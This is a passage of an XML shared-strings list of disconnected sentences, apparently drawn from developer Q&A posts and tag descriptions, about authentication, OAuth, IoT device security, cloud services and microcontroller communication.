  <si>
    <t>The problems will be: where do you store the PK in a secure way in the browser session and how to make a relation between the browser user and IoT device identity?</t>
  </si>
  <si>
    <t>It's still good to take advantage of whatever underlying security Bluetooth or other transports provides, but having your application encrypt the data will help improve your application's security over just depending on the transport layer.</t>
  </si>
  <si>
    <t>HttpURLConnection instance is used to make a single request but the underlying network connection to the HTTP server may be transparently shared by other instances.</t>
  </si>
  <si>
    <t>This Gem adds useful methods to Rails app to validate, display and save phone numbers.</t>
  </si>
  <si>
    <t>All permissions are defined in a single location (the Ability class) and not duplicated across UI components, API services, and database queries.</t>
  </si>
  <si>
    <t>Topics can range from the service user experience, issues with the trainer program written with Tensorflow, project quota issues, security, authentication, etc.</t>
  </si>
  <si>
    <t>In a typical usage scenario, a client requests access to a secure software application, often called a relying party.</t>
  </si>
  <si>
    <t>Single-Sign On
Social Media Login
Embeddable forums
Import from other forums
Commenting System for your site
Integates with other FOSS projects, like WordPress.</t>
  </si>
  <si>
    <t>This allows others (relying parties) to rely upon signatures or assertions made by the private key that corresponds to the public key that is certified.</t>
  </si>
  <si>
    <t>SQL Server 2005 also allows a database server to be exposed over web services using Tabular Data Stream (TDS) packets encapsulated within SOAP (protocol) requests.</t>
  </si>
  <si>
    <t>Cryptographic (authorization) layer: defines the method by which messages are encrypted prior to being transmitted through the transport protocol.</t>
  </si>
  <si>
    <t>PayUmoney is a payment service provider, based in India, which claims to "create a safe and secure ecosystem that enables anybody to make or receive payments".</t>
  </si>
  <si>
    <t>Firecracker enables you to deploy workloads in lightweight virtual machines, called microVMs, which provide enhanced security and workload isolation over traditional VMs, while enabling the speed and resource efficiency of containers.</t>
  </si>
  <si>
    <t>I have a cronjob that runs the following code on a schedule:
sudo head /home/pi/myNAS/myShare/vol | mail -s "" 2052400919@messaging.sprintpcs.com
The response I get when I run the code on the command line is:
Authorization failed (534 5.7.9 https://support.google.com/mail/bin/ans ... swer=78754 c41sm4496270yhc.53 - gsmtp)
I understand that the issue is related to authorization and security of the account.</t>
  </si>
  <si>
    <t>All is working, but I still need to store the codes in a way that I can easily access them.</t>
  </si>
  <si>
    <t>Is there any way to securely store these keys on the Pi?</t>
  </si>
  <si>
    <t>How and where do I indicate a particular Google account identity?</t>
  </si>
  <si>
    <t>How can I connect to a REST Service using the Intel Galileo board?</t>
  </si>
  <si>
    <t>I am aware of the protocol gateway offered where you can replace the gateways authentication provider.</t>
  </si>
  <si>
    <t>Are there any secure solutions for this?</t>
  </si>
  <si>
    <t>The gateway is a MQTT broker, but not a fully compliant one.</t>
  </si>
  <si>
    <t>No, Apple would not allow this for an app, because of privacy.</t>
  </si>
  <si>
    <t>You can store data persistently in eeprom on microcontroller, where you should keep your app key.</t>
  </si>
  <si>
    <t>An opaque gateway is one where the device's identity is not known or managed by IoT Hub.</t>
  </si>
  <si>
    <t>The third layer is the network layer.</t>
  </si>
  <si>
    <t>I don't know how secure this solution is.</t>
  </si>
  <si>
    <t>IoT Hub provides you with the ability to connect your devices over various protocols.</t>
  </si>
  <si>
    <t>It seems as though League of Legends has authentication for their apps, but its not available to third parties as yet, but they are working on it.</t>
  </si>
  <si>
    <t>This can be either a system account or OAuth.</t>
  </si>
  <si>
    <t>Select service to get the service key.</t>
  </si>
  <si>
    <t>Microsoft Active Directory Federation Services 2.0 is a Security Token Service.</t>
  </si>
  <si>
    <t>The Withings API allows developers to access a users stored data.</t>
  </si>
  <si>
    <t>AWS Key Management Service (KMS) is an encryption and key management service scaled for the cloud.</t>
  </si>
  <si>
    <t>Manage and provide access rights and controls.</t>
  </si>
  <si>
    <t>Python library for accessing a system's native keyring service.</t>
  </si>
  <si>
    <t>Online Certificate Status Protocol</t>
  </si>
  <si>
    <t>Authlogic is a clean, simple, and unobtrusive ruby authentication solution.</t>
  </si>
  <si>
    <t>OAuth 2.0 is an open protocol for authorization and authentication that is currently being drafted.</t>
  </si>
  <si>
    <t>Google OAuth 2.0 is a relatively simple protocol.</t>
  </si>
  <si>
    <t>To be fully secure.</t>
  </si>
  <si>
    <t>An Access Control namespace may contain many service identities.</t>
  </si>
  <si>
    <t>User registration and authentication
You can manage your application users.</t>
  </si>
  <si>
    <t>repoze.who is inspired by Zope 2s Pluggable Authentication Service (PAS) (but repoze.who is not dependent on Zope in any way; it is useful for any WSGI application).</t>
  </si>
  <si>
    <t>Authorization code flow 
2.</t>
  </si>
  <si>
    <t>The licensing service is a secure means of controlling access to your
  applications.</t>
  </si>
  <si>
    <t>You will need a developer account, which you can request from the developer center.</t>
  </si>
  <si>
    <t>Using AWS-IAM, we can manage the access and user roles.</t>
  </si>
  <si>
    <t>Ignite is fast and secure because of Firecracker.</t>
  </si>
  <si>
    <t>The
  Facebook Platform uses OAuth 2.0 for authentication and authorization.</t>
  </si>
  <si>
    <t>More than one user could be authorized to control a single device.</t>
  </si>
  <si>
    <t>With Greengrass already out in the market, Azure had the advantage of hindsight in launching their Edge intelligence and IoT Edge.</t>
  </si>
  <si>
    <t>It is the short definition of Intel Rapid Storage Technology</t>
  </si>
  <si>
    <t>As long as you don't write lots of small files, writing 1 file per request should not really be an issue
Use the .NET SDK should be pretty straightforward even without an existing binding 
To solve the authentication piece: Use Managed Service Identity (MSI) and KeyVault to store your client secrets there.</t>
  </si>
  <si>
    <t>As a security precaution, system devices are not exposed by default inside Docker containers.</t>
  </si>
  <si>
    <t>How do I make my E-Mails secure from E-Mail injection?</t>
  </si>
  <si>
    <t>Follow document Azure Container Registry authentication with service principals.</t>
  </si>
  <si>
    <t>Userena is a Django application that supplies your Django project with full account management.</t>
  </si>
  <si>
    <t>Manage a Docker private registry as a first-class Azure resource.</t>
  </si>
  <si>
    <t>I've looked at multiple resources online, and spent about 5-6 hours trying to crack this, but now i'm here asking for your help.</t>
  </si>
  <si>
    <t>TextMarks did close the 'lite' (free ad-based) service to new registrations about a year ago, but old accounts were grandfathered in.</t>
  </si>
  <si>
    <t>Employee1234.sh
then when the employee signs out they re execute script for a employee to log in.</t>
  </si>
  <si>
    <t>The Arduino UNO is not capable of doing secure communication using TLS due to its low memory footprint.</t>
  </si>
  <si>
    <t>is a simple interface for fast and safe DBI connection and transaction management.</t>
  </si>
  <si>
    <t>KNOX Work-space offers multiple-layered protection from the device down to the kernel with two-factor bio-metric authentication for authorized device access.</t>
  </si>
  <si>
    <t>Despite this NTLM is still used inside enterprise networks where Microsoft Active Directory provides the enterprise directory service for Integrated Windows Authentication when Kerberos is not available.</t>
  </si>
  <si>
    <t>Once routines, or routines evaluated only once, for object sharing and decentralized initialization.</t>
  </si>
  <si>
    <t>Since the camera will be located outside, I am looking for weather proof night vision enabled USB cameras that I can easily control via OPENCV.</t>
  </si>
  <si>
    <t>Session hijacking is a type of network security attack that relies on "guessing" the ISNs of TCP packets and taking control over communication.</t>
  </si>
  <si>
    <t>To authorize multiple accounts, simply repeat the last step,
signing into Twitter as a different user.</t>
  </si>
  <si>
    <t>I'm looking for a control panel where I can add domain names &amp; email accounts and will also setup the mailserver backend on installation.</t>
  </si>
  <si>
    <t>Now, supposed that I know the messaging protocol of the device, I would like to build a field gateway to apply protocol and identity translation with the IoT Hub behind IoT Central.</t>
  </si>
  <si>
    <t>In network terms, the party requesting a connection and the party granting the connection can potentially assert identities.</t>
  </si>
  <si>
    <t>Even while supporting multiple discovery protocols, Connect SDK is able to generate one unified list of discovered devices from the same network.</t>
  </si>
  <si>
    <t>Little back story first so I'm working on a Raspberry Pi project that involves using an LTE service currently I have a dashboard running on a AWS EC2 web server with a simple user working user login.</t>
  </si>
  <si>
    <t>The Lifelog API is a REST-based web-service API in which developers use endpoints like User profile, Activities and Locations to get secure access to Lifelog data for a user.</t>
  </si>
  <si>
    <t>Forward-thinking organizations today are using SAS data mining software to detect fraud, anticipate resource demands, increase acquisitions and curb customer attrition.</t>
  </si>
  <si>
    <t>Ledger Nano S is a Bitcoin, Ethereum and Altcoins hardware wallet, based on robust safety features for storing cryptographic assets and securing digital payments.</t>
  </si>
  <si>
    <t>djoser library provides a set of Django Rest Framework views to handle basic actions such as registration, login, logout, password reset and account activation.</t>
  </si>
  <si>
    <t>We are currently working in a solution in order to embed that ideal solution of the two certs and the private key at the gateway hardware which will forward the information sent by the sensor in a secure way.</t>
  </si>
  <si>
    <t>I know that the example at here manages to somehow do overlay text onto the video feed during facial recognition but I cannot figure out how to implement this feature onto a much simpler streaming code like this.</t>
  </si>
  <si>
    <t>Note: I'm not too sure if it is just single, try the following if it doesn't work:
Single=1
singleuser
Switching to single user mode will allow you to login as root automatically and correct the issue on the PI.</t>
  </si>
  <si>
    <t>In my friend's case, VS would fail deploying the app every single time, no matter if the firewall was turned off or if netstart Winrm command was issued.</t>
  </si>
  <si>
    <t>If the module you mentioned REALLY only accepts IP addresses then you need to raise a bug against the supplier saying this needs fixing, especially as this is for a field deployed device that you probably can't easily update once deployed.</t>
  </si>
  <si>
    <t>Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a network security standard that attempts to allow users to easily secure a wireless home network.</t>
  </si>
  <si>
    <t>By hosting your domains in Azure, you can manage your DNS records using the same credentials, APIs, tools and billing as your other Azure services.</t>
  </si>
  <si>
    <t>Azure Information Protection (AIP) is a cloud-based solution that helps an organization to classify and optionally, protect its documents and emails by applying labels.</t>
  </si>
  <si>
    <t>They are often more secure than single factor authentication methods such as username-password (something the user knows) due to their single use which makes replay attacks impossible</t>
  </si>
  <si>
    <t>The Platform for Privacy Preferences Project, or P3P, is a protocol allowing websites to declare their intended use of information they collect about browsing users.</t>
  </si>
  <si>
    <t>It is part of the Windows Live range of online services and allows users to keep the files private, share them with contacts, or make the files public.</t>
  </si>
  <si>
    <t>It allows you to easily store structured data in the cloud that can span both devices and users, integrate it with user authentication, as well as send out updates to clients via push notifications.</t>
  </si>
  <si>
    <t>MaxMind's industry-leading minFraud service helps businesses prevent fraudulent online transactions and reduce manual review.</t>
  </si>
  <si>
    <t>Tagging is carried out to perform functions such as aiding in classification, marking ownership, noting boundaries, and indicating online identity.</t>
  </si>
  <si>
    <t>SSHKit uses a simple connection pool (enabled by default) to reduce the cost of negotiating a new SSH connection for every  block.</t>
  </si>
  <si>
    <t>Famous Cloud Services Command Line Utility
register, manage user accounts, create, update and share projects
On Github</t>
  </si>
  <si>
    <t>These attributes may be indirectly associated with the user making the access request, but the authorization decision can be made even if the authorization authority does not know or recognize the identity of the user.</t>
  </si>
  <si>
    <t>Extensible SSH Shell console : Karaf features a nice text console where you can manage the services, install new applications or libraries and manage their state.</t>
  </si>
  <si>
    <t>It was designed by the Internet Engineering Task Force (IETF) as an extension of the Secure Shell protocol (SSH) version 2.0 to provide secure file transfer capability, but is also intended to be usable with other protocols.</t>
  </si>
  <si>
    <t>The Spam module provides numerous tools to auto-detect and deal with spam content that is posted to your site, without having to rely on third-party services.</t>
  </si>
  <si>
    <t>Oracle Metadata Services
The Oracle Metadata Services (MDS) framework allows you to create applications that your customers can further customize for their users or customers and which the end users can also customize without touching the source code or affecting the ability of the application to be patched or updated.</t>
  </si>
  <si>
    <t>A file system attribute used mainly for access control to file resources.</t>
  </si>
  <si>
    <t>Engage Is now known as Social Login or Social Sharing.</t>
  </si>
  <si>
    <t>I'm trying to make a mildly secure communication between Arduino and PHP.</t>
  </si>
  <si>
    <t>So, my current solution isn't reliable.</t>
  </si>
  <si>
    <t>I have tried this using the url https://&lt;company&gt;.jira.com/login?username=&lt;username&gt;&amp;password=&lt;password&gt;&amp;dest-url=/secure/RapidBoard.jspa?rapidView=&lt;id&gt;&amp;view=detail.</t>
  </si>
  <si>
    <t>I need a responsive answer for my service and to secure it against sniffing.</t>
  </si>
  <si>
    <t>They will expose the data via Rest services.</t>
  </si>
  <si>
    <t>Same credentials are being used to accessing the app store as for enrolling the device.</t>
  </si>
  <si>
    <t>Watson IoT therefore offers a secure connection (?)</t>
  </si>
  <si>
    <t>I am not trying to secure the UI, I am trying to secure the editor.</t>
  </si>
  <si>
    <t>My goal is to be able to access the Pi via ssh while also sharing my Wifi connection to the Pi.</t>
  </si>
  <si>
    <t>AFAIK it may caused mitm attack , So I want to use secure communication which is createRfcommSocketToServiceRecord.</t>
  </si>
  <si>
    <t>is fast but not super secure</t>
  </si>
  <si>
    <t>Unfortunately there are no truly secure communication options available on Arduino.</t>
  </si>
  <si>
    <t>Note that the print statement is not entirely reliable with segfaults on all platforms, but it indicates that the code has run at least that far.</t>
  </si>
  <si>
    <t>Enable Less Secure Apps doesn't help for me.</t>
  </si>
  <si>
    <t>P.S: You need to register and get the Flickr API and secret keys from -https://www.flickr.com/services/apps/create/</t>
  </si>
  <si>
    <t>For the full backend authentication the mobile app could use e.g.</t>
  </si>
  <si>
    <t>Azure IoT HuB uses TLS to securely connect devices to the Azure Cloud.</t>
  </si>
  <si>
    <t>Finally I managed to drop rpi3 to secure el1.</t>
  </si>
  <si>
    <t>The AWS SDK for javascript, using HTTP as a protocol, and IAM roles (among other things) for authentication.</t>
  </si>
  <si>
    <t>No other
  authorization protocols are supported.</t>
  </si>
  <si>
    <t>This service is meant for customers who want to analyze data on devices, a.k.a.</t>
  </si>
  <si>
    <t>I think it should be possible to have reliable Modbus communication for most scenarios.</t>
  </si>
  <si>
    <t>Iron claims to be optimized for privacy and security.</t>
  </si>
  <si>
    <t>Treasure Data is a Hadoop-based Big Data as-a-Service service.</t>
  </si>
  <si>
    <t>Wireless Application Protocol is a subset of XHTML and a superset of XHTML Basic, used by mobile devices.</t>
  </si>
  <si>
    <t>Anti-Virus Guard (AVG) is a family of anti-virus and Internet security software for the Microsoft Windows, Linux, Mac OS X, and FreeBSD computing platforms.</t>
  </si>
  <si>
    <t>Some of its products are Access Manager, AppManager, Secure Configuration Manager, Sentinel, and Identity Manager.</t>
  </si>
  <si>
    <t>CloudKit also provides a user identity so that an iCloud account can be used for sign-in for your app.</t>
  </si>
  <si>
    <t>Lavaboom is a secure email provider founded in January 2014.</t>
  </si>
  <si>
    <t>A cross-platform API for authenticating users and storing their accounts.</t>
  </si>
  <si>
    <t>mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that authenticates users against an OpenID Connect Provider.</t>
  </si>
  <si>
    <t>Google Sign-In is a secure authentication system which reduces the burden of login for your users, by allowing them to login with their Google account.</t>
  </si>
  <si>
    <t>The Oracle Managed DataAccess Provider is the .Net Native version of ODP.Net.</t>
  </si>
  <si>
    <t>Authlete is a cloud based OAuth 2.0 server &amp; OpenID provider.</t>
  </si>
  <si>
    <t>python-cryptography is a python library for secure cryptographic services.</t>
  </si>
  <si>
    <t>RSA SecurID Access delivers secure and convenient access for any user, from anywhere, to anything.</t>
  </si>
  <si>
    <t>OpenSSO is an open source access management and federation server platform.</t>
  </si>
  <si>
    <t>A VPN gateway is a type of networking device that connects two or more devices or networks together in a VPN infrastructure.</t>
  </si>
  <si>
    <t>Additionally, Bouncycastle provides a JCE-compliant crypto provider for Java.</t>
  </si>
  <si>
    <t>Questions about authentication for RESTful services.</t>
  </si>
  <si>
    <t>Shared primary key comes with a cost.</t>
  </si>
  <si>
    <t>Unhosted apps share data in a de-centralized way.</t>
  </si>
  <si>
    <t>TrueVault is a secure data vault.</t>
  </si>
  <si>
    <t>Resources:
Announcing RTM of ASP.NET Identity 2.0.0</t>
  </si>
  <si>
    <t>API Documentation and access registration is located at the Withings Developer Center.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a secure email provider founded in January 2014.</t>
  </si>
  <si>
    <t>Xamarin.Auth is a cross-platform API for authenticating users and storing their accounts.</t>
  </si>
  <si>
    <t>The Google Container Registry runs on Google Cloud Platform, so can be relied upon for consistent uptime and security.</t>
  </si>
  <si>
    <t>No special account or registration is
  needed.</t>
  </si>
  <si>
    <t>APIs exposed by Jet.com e-commerce platform (https://developer.jet.com/)</t>
  </si>
  <si>
    <t>All connections are fully secured.</t>
  </si>
  <si>
    <t>It is secure and extremely fast.</t>
  </si>
  <si>
    <t>The Registration Data Access Protocol (RDAP)  is an alternative to WHOIS for accessing Internet resource registration data.</t>
  </si>
  <si>
    <t>Users can create an account and login with a user name and password or they can use an external login providers such as Facebook, Google, Microsoft Account, Twitter and more.</t>
  </si>
  <si>
    <t>Sentinel is a PHP 5.4+ fully-featured authentication &amp; authorization system.</t>
  </si>
  <si>
    <t>The Central Authentication Service (CAS) is a single sign-on protocol for the web.</t>
  </si>
  <si>
    <t>Resources
How do I handle authentication in REST?</t>
  </si>
  <si>
    <t>Google Container Registry provides secure, private Docker image storage on Google Cloud Platform.</t>
  </si>
  <si>
    <t>JmDNS is a Java implementation of multi-cast DNS and can be used for service registration and discovery in local area networks.</t>
  </si>
  <si>
    <t>Trusted Computing is a technology to enhance security of computer systems.</t>
  </si>
  <si>
    <t>The TPM2 support should be enabled through the meta-security/meta-tpm layer and by adding MACHINE_FEATURES "tpm2" and installing "packagegroup-security-tpm2" via IMAGE_INSTALL_append.</t>
  </si>
  <si>
    <t>It refers to a security architecture for distributed systems, which enables control over which users are allowed access to which services, and how much of the resources they have used.</t>
  </si>
  <si>
    <t>For more information on how to request certificates and code sign your apps, review the IOS App Distribution Guide</t>
  </si>
  <si>
    <t>NEM has a stated goal of a wide distribution model and has introduced new features to blockchain technology such as its POI algorithm, multisignature accounts, encrypted messaging, and more.</t>
  </si>
  <si>
    <t>It uses a global content delivery network to provide website security, DDoS protection, load balancing and failover services to clients.</t>
  </si>
  <si>
    <t>Support for importing friends from Facebook, followers from Twitter and contacts from LinkedIn is available, but currently Facebook, Twitter and LinkedIn do not provide email addresses.</t>
  </si>
  <si>
    <t>My ultimate objective at this point is to have a simple home automation server (maybe lights and climate control) with a secure ASP.NET web application interface.</t>
  </si>
  <si>
    <t>For distribution of the private key after manufacture, it gets a bit more complicated because you're effectively creating another channel for devices to be managed in your registry.</t>
  </si>
  <si>
    <t>Djoser library provides a set of Django Rest Framework views to handle basic actions such as registration, login, logout, password reset and account activation.</t>
  </si>
  <si>
    <t>The last one, Call Gates, are particularly important for transferring control between x86 privilege levels although this mechanism is not used on most modern operating systems.</t>
  </si>
  <si>
    <t>Thanks in advance
[2017-02-08 05:19:13,769] [IoT-Broker] ERROR {org.wso2.carbon.andes.extensions.device.mgt.mqtt.authorization.DeviceAccessBasedMQTTAuthorizer} -  status 404 reading DeviceAccessAuthorizationAdminService#isAuthorized(AuthorizationRequest); content:
404Status reportNot FoundThe requested resource (/api/device-mgt/v1.0/admin/authorization) is not available.</t>
  </si>
  <si>
    <t>On a production level system you do the authentication like below:
Assuming your device is connected on the network, you do a device discovery using open source discovery protocols like UPNP or bonjour(developer by apple) etc.</t>
  </si>
  <si>
    <t>Group Policy is a feature of the Microsoft Windows NT family of operating systems that control the working environment of user accounts and computer accounts.</t>
  </si>
  <si>
    <t>It also provides a process for end-users to authorize
  third-party access to their server resources without sharing their
  credentials (typically, a username and password pair), using
  user-agent redirections.</t>
  </si>
  <si>
    <t>Upon successful authentication, Windows Azure Active Directory Access Control generates a cryptographically signed token, containing a set of claims that tell what the user can do in the application.</t>
  </si>
  <si>
    <t>The top level of this tree is a module that is anonymous [...] The Rust compiler is always invoked with a single source file as input, and always produces a single output crate.</t>
  </si>
  <si>
    <t>From your question, I don't understand why you'd even leave the  user in place...
... runs backend programs with root privilege
Never a good idea - use service accounts instead.</t>
  </si>
  <si>
    <t>Create virtual interfaces directly into the AWS cloud and Amazon Virtual Private Cloud, bypassing Internet service providers in the network path.</t>
  </si>
  <si>
    <t>Many factors influence a barcode's readability including: reflectance, contrast, maintenance of quiet zone, adherence to specifications, printing technology, print media, physical defects.</t>
  </si>
  <si>
    <t>A cloud service must have at least two instances of every role to qualify for the Windows Azure Service Level Agreement, which guarantees external connectivity to your Internet-facing roles at least 99.95 of the time.</t>
  </si>
  <si>
    <t>Spell-checkers can offer a wide range of functionality, from simple verification of individual words to offering corrections or even context-specific suggestions.</t>
  </si>
  <si>
    <t>(You no longer control the physical location of your data in cloud hosting)
The security issue is always one of the major questions and arguments raised when it comes to cloud hosting.</t>
  </si>
  <si>
    <t>Exim Features
SMTP
TLS (via either OpenSSL or GnuTLS)
SMTP AUTH over a variety of authentication mechanisms, with data from various sources
Native support for mbox, mbx, maildir &amp; mailstore formats, plus LMTP to a socket or invoking arbitrary delivery programs.</t>
  </si>
  <si>
    <t>There are several reasons for providing an environment that allows process cooperation:
Information sharing
Speedup
Modularity
Convenience
Privilege separation
IPC may also be referred to as inter-thread communication and inter-application communication.</t>
  </si>
  <si>
    <t>With deprecated support for ASP.NET 1.1 (via version 2.x) and full support for ASP.NET 2 and higher, you can easily configure what pages/resources should be secured via your website's SSL certificate.</t>
  </si>
  <si>
    <t>According to Sound Switch, there is no public API to detect the state of the silent switch, but they provide a hack (using public APIs and therefore believed to be OK for Ap Store approval, but still to be treated with caution): 
http://sharkfood.com/content/Developers/content/Sound%20Switch/</t>
  </si>
  <si>
    <t>It's a simple but not secure method.</t>
  </si>
  <si>
    <t>I'd like to see a working example of sending media and other control keys.</t>
  </si>
  <si>
    <t>like in desktop windows, does Microsoft provide credential manager for Windows Iot Core 10 .?</t>
  </si>
  <si>
    <t>So it is definitely possible to secure communication between Arduino and a server.</t>
  </si>
  <si>
    <t>It supersedes previous solutions such as Restful Authentication or Authlogic.</t>
  </si>
  <si>
    <t>REST implementation of Django authentication system.</t>
  </si>
  <si>
    <t>MarkLogic is scalable and elastic, has enterprise security and ACID transactions.</t>
  </si>
  <si>
    <t>It is common that a system allows users to have several roles, the user then has the union of all the permissions of their roles.</t>
  </si>
  <si>
    <t>Can manage organizations and register applications.</t>
  </si>
  <si>
    <t>Control Tower:
Business Intelligence/Dashboard solution.</t>
  </si>
  <si>
    <t>If not, is there a workaround to pull this data from users facebook account if they give authentication?</t>
  </si>
  <si>
    <t>Is it possible to implement communication protocols with gstreamer, i.e like handshake and etc.</t>
  </si>
  <si>
    <t>So, is there a fast way to encrypt single files (esp.</t>
  </si>
  <si>
    <t>However, my issue is that I wish to have the web services as secure as possible.</t>
  </si>
  <si>
    <t>To accomplish this I needed a page token and a facebook app.</t>
  </si>
  <si>
    <t>I'm trying to implement a simple voice recognition using pocketsphinx.</t>
  </si>
  <si>
    <t>Now the problem is when I scan my college identity card it shows an error "Authentication failed () :communication error".</t>
  </si>
  <si>
    <t>Could anyone tell or point out a way to build a secure communication between python server and raspberry pi.</t>
  </si>
  <si>
    <t>I managed to inter-connect multiple raspberry together with multicast dns and now I'm trying to share a small json between all raspberry, in a decentralized way.</t>
  </si>
  <si>
    <t>I found many resources for connecting to open API's on Arduino, but nothing on connecting to secure ones.</t>
  </si>
  <si>
    <t>Need to deploy an IotEdgehub deployment on a company intranet (For security reasons).</t>
  </si>
  <si>
    <t>What do I have to do to allow other voice-recognized google accounts to be able to use my action?</t>
  </si>
  <si>
    <t>The transmitter says that the network is active, but the client cannot connect, and when I look in my laptop WiFi manager the network isn't there either.</t>
  </si>
  <si>
    <t>I have authenticated using a service account with full permissions.</t>
  </si>
  <si>
    <t>The general model in modern OSes is to delegate the hardware access to a kernel resident device driver.</t>
  </si>
  <si>
    <t>Could be a simple solution to avoid corrupting the data.</t>
  </si>
  <si>
    <t>You should design reliable I2C communication in a similar way.</t>
  </si>
  <si>
    <t>For sending simple control commands, ssh is an overkill to say the least.</t>
  </si>
  <si>
    <t>Bypassing the SDKs would also allow you to bypass the authorization.</t>
  </si>
  <si>
    <t>You'll need to create an app to be able to get an app access token.</t>
  </si>
  <si>
    <t>SOLUTION: The solution to this problem is to also define the gateway and key:
Then install isc-dhcp-server.</t>
  </si>
  <si>
    <t>Bluetooth is one of the most popular protocols for wireless communication between devices.</t>
  </si>
  <si>
    <t>I have experienced that using HC05 with Software Serial is reliable.</t>
  </si>
  <si>
    <t xml:space="preserve">
Matlab is not super reliable with serial communication.</t>
  </si>
  <si>
    <t>As far as I know, Shared Access Key(DeviceKey) won't expire but SAS(Shared Access Signatures) will.</t>
  </si>
  <si>
    <t>Otherwise, Layer 2 (pure wifi without IP and TCP) communication is also OK if there are only two devices in your network.</t>
  </si>
  <si>
    <t>By default, keybord apps are not installed on AT Developer Preview.</t>
  </si>
  <si>
    <t>In enterprise applications you may want to programmatically access users data without any manual authorization on their part.</t>
  </si>
  <si>
    <t>The information about how to use credentials from a Service account is available here.</t>
  </si>
  <si>
    <t>So you need to add the public certificate of your keystore to the identity provider.</t>
  </si>
  <si>
    <t>From what ive seen any emulation (Philips Hue or Wemo) wont work now as you need to sign into that providers account.</t>
  </si>
  <si>
    <t>But if you want to have another id then you should make use of some message service providers.</t>
  </si>
  <si>
    <t>I don't know of any apps that expose a users location for 3rd parties to use.</t>
  </si>
  <si>
    <t>This will take in the service account credentials you used and will authenticate against Google API Core servers.</t>
  </si>
  <si>
    <t>I'm unsure the extent of IFTTT's capabilities, so I don't think any local control is possible.</t>
  </si>
  <si>
    <t>I assume the user account information (e-mail address?)</t>
  </si>
  <si>
    <t>As Shubham stated, using a service account is one way to authenticate devices.</t>
  </si>
  <si>
    <t>I can't immediately think of any way this would break the security of the service provider.</t>
  </si>
  <si>
    <t>Solution 1: use SSH pre-shared key to login via SSH without a password.</t>
  </si>
  <si>
    <t>Then, go to the dashboard and get the token from Step 3 (Connect your account).</t>
  </si>
  <si>
    <t>SSH offers a much higher standard of security than most protocols.</t>
  </si>
  <si>
    <t>This is our security step so that only apps you want to control your lights can.</t>
  </si>
  <si>
    <t>Any possible solutions, or other methods of communicating with AWS IoT using MQTT in react native when using certificates for authentication?</t>
  </si>
  <si>
    <t>The Lambda would need to implement authentication that your non-AWS cloud provider supports (e.g.</t>
  </si>
  <si>
    <t>You can also use the service SDK with a shared access policy to get this information.</t>
  </si>
  <si>
    <t>Just for simple login you don't need a database, you probably need just a simple table.</t>
  </si>
  <si>
    <t>NFC peer-to-peer mode and the Simple NDEF Exchange Protocol are used to initiate the communication.</t>
  </si>
  <si>
    <t>Steam also provides simple API's and OpenID endpoints for user authentication.</t>
  </si>
  <si>
    <t>TUN is a virtual network layer device which operates in OSI layer 3.</t>
  </si>
  <si>
    <t>silvertunnel.org - easy-to-use secure and anonymous communication</t>
  </si>
  <si>
    <t>RADIUS is Remote Authentication Dial In User Service, a protocol that carries authentication, authorization and accounting data.</t>
  </si>
  <si>
    <t>Code signing is a security technology, used in OS X, that allows you to certify that an app was created by you.</t>
  </si>
  <si>
    <t>django-auth-ldap is a pluggable Django app that provides an authentication backend that authenticates against an LDAP service</t>
  </si>
  <si>
    <t>Account allows a user to authenticate (does not imply authorization) to system services and be granted authorization to access them;.</t>
  </si>
  <si>
    <t>The graphical identification and authentication (GINA) library is a component of some Microsoft Windows operating systems that provides secure authentication and interactive logon services.</t>
  </si>
  <si>
    <t>Key/Value stores allow the application to store its data by composing `(key, value)` pairs.</t>
  </si>
  <si>
    <t>CardDAV is an address book client/server protocol designed to allow users to access and share contact data on a server.</t>
  </si>
  <si>
    <t>Google Search - customized and secured in an appliance for use behind an organisation's firewall.</t>
  </si>
  <si>
    <t>Identifier for an app that is unique across all apps within a given platform</t>
  </si>
  <si>
    <t>It allows users to login to registered third party websites or apps using their Amazon user name and password.</t>
  </si>
  <si>
    <t>It is written in Java and relies solely on the JCA APIs for cryptography.</t>
  </si>
  <si>
    <t>authopen provides authorization-based file opening services.</t>
  </si>
  <si>
    <t>*Deprecated* Firebase Simple Login is Firebase's deprecated simple login service.</t>
  </si>
  <si>
    <t>Provides SQL-like APIs that are fast, safe, and easy to use.</t>
  </si>
  <si>
    <t>Virtual Private Server (VPS) platform from Amazon Web Services</t>
  </si>
  <si>
    <t>Questions related to Google Cloud Identity Aware Proxy</t>
  </si>
  <si>
    <t>Ranger is a framework to enable, monitor and manage comprehensive data security across the Hadoop platform.</t>
  </si>
  <si>
    <t>Apache Ranger is a framework to enable, monitor and manage comprehensive data security across the Hadoop platform.</t>
  </si>
  <si>
    <t>A simple Node.js client library for Oauth2.</t>
  </si>
  <si>
    <t>Erasure Coding, YARN Timeline Service v2, Opportunistic Containers, 3+ NameNode fault-tolerance).</t>
  </si>
  <si>
    <t>Azure Sphere is Microsoft's solution for creating secured, internet-connected microcontroller devices.</t>
  </si>
  <si>
    <t>It can also be used as a communications protocol in a private network (either an intranet or an extranet).</t>
  </si>
  <si>
    <t>FIWARE Keyrock is the reference implementation of the Identity Manager (IdM) Generic Enabler specification.</t>
  </si>
  <si>
    <t>The Internet Protocol is one of the fundamental protocols used for the Internet.</t>
  </si>
  <si>
    <t>Laravel permission is a 3rd party Laravel package to manage user permissions and roles in a database.</t>
  </si>
  <si>
    <t>X.509 is an standard for a public key infrastructure used for authentication and access control.</t>
  </si>
  <si>
    <t>An SSL certificate is an X.509 certificate that is used to provide authentication, privacy and integrity for a secure connection.</t>
  </si>
  <si>
    <t>Setup user accounts, DNS, file sharing and the program is freeware.</t>
  </si>
  <si>
    <t>Information
It mainly rely on the OAuth library: twitteroauth.</t>
  </si>
  <si>
    <t>SmartyStreets is a company that provides street-address validation and geocoding API services.</t>
  </si>
  <si>
    <t>Facebook offers several login flows for different devices and projects.</t>
  </si>
  <si>
    <t>Handle user registration or account recovery.</t>
  </si>
  <si>
    <t>django-auth-ldap is a pluggable Django app that provides an authentication backend that authenticates against an LDAP service.</t>
  </si>
  <si>
    <t>Automatically and securely store user credentials using Xamarin.Auth.</t>
  </si>
  <si>
    <t>This library allows a Java application to gain permission from a user to access the personal data they store with an OAuth provider such as Twitter, Facebook, Instagram, and many others.</t>
  </si>
  <si>
    <t>In the sidebar on the left, select APIs &amp; auth, then select
Registered apps.</t>
  </si>
  <si>
    <t>In the staging environment, the cloud service's globally unique identifier (GUID) identifies it in URLs (GUID.cloudapp.net).</t>
  </si>
  <si>
    <t>A private Platform as a Service based on Cloud Foundry.</t>
  </si>
  <si>
